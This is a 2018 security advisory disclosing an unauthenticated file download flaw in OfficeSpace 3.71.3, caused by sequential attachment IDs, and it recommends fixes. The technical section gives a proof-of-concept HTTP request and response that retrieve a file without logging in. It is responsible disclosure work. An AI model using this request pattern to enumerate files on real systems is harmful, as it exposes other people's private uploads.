############################################################# # # COMPASS SECURITY ADVISORY # https://www.compass-security.com/research/advisories/ # ############################################################# # # Product: OfficeSpace [1] # Vendor: OfficeSpace Software Inc. # CSNC ID: CSNC-2018-019 # Subject: Anonymous File Download # Risk: High # Effect: Remotely exploitable # Author: Stephan Sekula # Date: 18.04.2018 # ############################################################# Introduction: ------------- The smarter, easier way to manage your space. [1] Compass Security discovered a security flaw in OfficeSpace, which allows anonymous users to access uploaded files. Affected: --------- Vulnerable: * Version 3.71.3 Technical Description --------------------- Users are able to upload files to the system. Uploaded files can be accessed by anonymous users. Since the file IDs are assigned sequentially, exploiting this vulnerability is easy. Request (accessing an uploaded file without being authenticated): GET /request-manager/attachments/14/download HTTP/1.1 Host: [CUT].officespacesoftware.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Response: HTTP/1.1 200 OK Date: Wed, 18 Apr 2018 05:28:56 GMT X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Content-Type: text/plain Content-Disposition: attachment; filename="eicar.com.txt" Content-Transfer-Encoding: binary Cache-Control: private Strict-Transport-Security: max-age=15552000; includeSubDomains Vary: Accept-Encoding Content-Length: 68 Connection: close [EICAR-STRING] Workaround / Fix: ----------------- This issue can be fixed by properly checking a user's authentication and authorization for each request. Further, file IDs should be long and random to make guessing them more difficult. Timeline: --------- 2018-07-31: Public disclosure date 2018-05-02: Initial vendor response 2018-04-23: Initial vendor notification 2018-04-18: Discovery by Stephan Sekula References: ----------- [1] https://www.officespacesoftware.com